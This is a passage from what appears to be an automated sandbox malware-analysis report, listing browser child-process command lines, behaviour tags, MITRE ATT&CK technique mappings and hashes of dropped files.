      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
      4⤵
      PID:6192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
      4⤵
      PID:7160
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2100 /prefetch:2
      4⤵
      PID:6608
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2104 /prefetch:2
      4⤵
      PID:6368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2676 /prefetch:2
      4⤵
      PID:5196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5572 /prefetch:2
      4⤵
      PID:6544
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,15920509542403187795,5792521989216901086,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5772 /prefetch:2
      4⤵
      PID:5572
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:5412
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffeb94dcc40,0x7ffeb94dcc4c,0x7ffeb94dcc58
      4⤵
      PID:4284
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2040,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=2036 /prefetch:2
      4⤵
      PID:632
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=1800,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=2052 /prefetch:3
      4⤵
      PID:5620
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=2212,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=2228 /prefetch:8
      4⤵
      PID:5612
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3044,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=3064 /prefetch:1
      4⤵
      PID:5864
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3088,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=3128 /prefetch:1
      4⤵
      PID:5948
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=4404 /prefetch:1
      4⤵
      PID:6156
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=3648,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=3708 /prefetch:8
      4⤵
      PID:6484
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=4684,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=4696 /prefetch:8
      4⤵
      PID:6540
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=4716,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=4844 /prefetch:8
      4⤵
      PID:6552
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=4852,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=4788 /prefetch:8
      4⤵
      PID:6820
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4640,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=4724 /prefetch:1
      4⤵
      PID:6928
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=5080,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=5228 /prefetch:8
      4⤵
      PID:5548
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=5184,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=5412 /prefetch:8
      4⤵
      PID:7076
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=5248,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=5528 /prefetch:8
      4⤵
      PID:6196
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=5472,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=4812 /prefetch:8
      4⤵
      PID:6432
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --no-appcompat-clear --field-trial-handle=5456,i,5234027415980997852,3846388126535794166,262144 --variations-seed-version=20250307-130002.704000 --mojo-platform-channel-handle=5416 /prefetch:8
      4⤵
      PID:1684
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    PID:6384
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffeb94dcc40,0x7ffeb94dcc4c,0x7ffeb94dcc58
      4⤵
      PID:400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeb94dcc40,0x7ffeb94dcc4c,0x7ffeb94dcc58
  2⤵
  PID:3456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1832,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1812 /prefetch:2
  2⤵
  PID:740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2084,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  PID:2208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2324 /prefetch:8
  2⤵
  PID:4080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3160 /prefetch:1
  2⤵
  PID:908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:1592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4592,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:1
  2⤵
  PID:628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3712 /prefetch:8
  2⤵
  PID:3968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:3956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5000 /prefetch:8
  2⤵
  PID:4572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5076,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8
  2⤵
  PID:2924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4976,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5092 /prefetch:8
  2⤵
  PID:756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5004,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5200 /prefetch:8
  2⤵
  PID:2256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4812,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4576 /prefetch:8
  2⤵
  PID:4836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5216,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8
  2⤵
  PID:5224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5344,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5364 /prefetch:2
  2⤵
  PID:5188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5372,i,2721528933648202691,17633062700478764404,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5616 /prefetch:1
  2⤵
  PID:5352

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:964

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5704

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:5628

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad\settings.dat

Filesize
40B

MD5
ca4b11b02bfb5fc8793517891b8b97a5

SHA1
b11fa1674ec78c9411c643de1fd7781a1b8894bf

SHA256
f6d815cf1e9d1d31b99cd34656ea29b649957cc984aa944d48e6a1a6f0eeb043

SHA512
c4ed69bbf2e06f3789d421eeca472f5e9380224b3e21fe2f43018f223a863952d043157237ae33ad8f0ec433b10a551fd7b4ca0bb50192286a68b27c9e86dcec

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
240B

MD5
b011d57b492085e5750791333d3a1a83

SHA1
152184ecbc656e59f0b9491b61925676bd7aec8c

SHA256
7a19ee2b00e7085cd9260cf6bfdaf3738ba576b0d8bf18c7165e8cce05c4e052

SHA512
61a8ca7463144599527aa08544cf7ad97e82033b5b0ad19519141bdbd2ef365a0a8d32251337c1003f0a10fdc733c9e632bdc12a6d137d7b9a2a14c9cc601d0c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Code Cache\js\index-dir\the-real-index~RFe5939f2.TMP

Filesize
120B

MD5
56f98be1003d32770ecd2aaac5c5319d

SHA1
e6496e14fa2e3d3aeabb7107e411a38b6d48db09

SHA256
c194e1fbf057717fd2affc96a071a18574a313885920abd3c0c2ad28020a6d25

SHA512
51a168a54c86dccab15dbbede865c858a78a39cb74c4614c26edc3e74257085b1564519373c85e830ce9f72b2593134e0c6b4f5f371595aeee50e4aa41d5ea1a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_US\messages.json

Filesize
1KB

MD5
578215fbb8c12cb7e6cd73fbd16ec994

SHA1
9471d71fa6d82ce1863b74e24237ad4fd9477187

SHA256
102b586b197ea7d6edfeb874b97f95b05d229ea6a92780ea8544c4ff1e6bc5b1

SHA512
e698b1a6a6ed6963182f7d25ac12c6de06c45d14499ddc91e81bdb35474e7ec9071cfebd869b7d129cb2cd127bc1442c75e408e21eb8e5e6906a607a3982b212

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

Filesize
356B

MD5
98dda98ab1d567b70c67c0ff4da8fb3c

SHA1
529bc5c1020b65a3827cb82beca04019414dc55c

SHA256
b8b32e1ec324d215166414139173c59ccf5ccc8d3321739b24c33e8a6d8879c8

SHA512
87f8b8af6e5e3a725772ba01e55d1e92688ffc8fbb15ae15de7f074d2aab946ddb40f280336ab1d006a2f21c1d0670a5faee02fc708e164ddbab669f2f1b6d11

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

Filesize
692B

MD5
dda705cffa6acccd920732c46eff0fe8

SHA1
aa36f266ff9b3e05e7c3ab66b4c8495ad911ce9d

SHA256
7a537d7125c8489adede20092856fc18f2ad367d41617f9d589cb1efd9d16aed

SHA512
978e268a50f18447bd02748754cf8fb3d95e12e9f18d926ab447eb95d1fd2b4a7c2c27a9300ed63e5dae2f64a581c47fa32d201726fc6c5abe543b418374d6dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

Filesize
859B

MD5
5ccfb2e8c08590df281fafa3c4ecd7a2

SHA1
4e4d236cbfb50e38a3dcdb57a9d7ed8510663562

SHA256
23bf5c5ff213d08308d6f3c84f2a74f47efff34575ef1cd1f0d5103cd969816a

SHA512
0520d44ab46fcdfeaf64ef0e8168d0a277a6bb56232316d2713fdd03b578de2b3f99034f8533c1539da689a97d652c9035cb637159a172b28a78f1e06989ae03

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
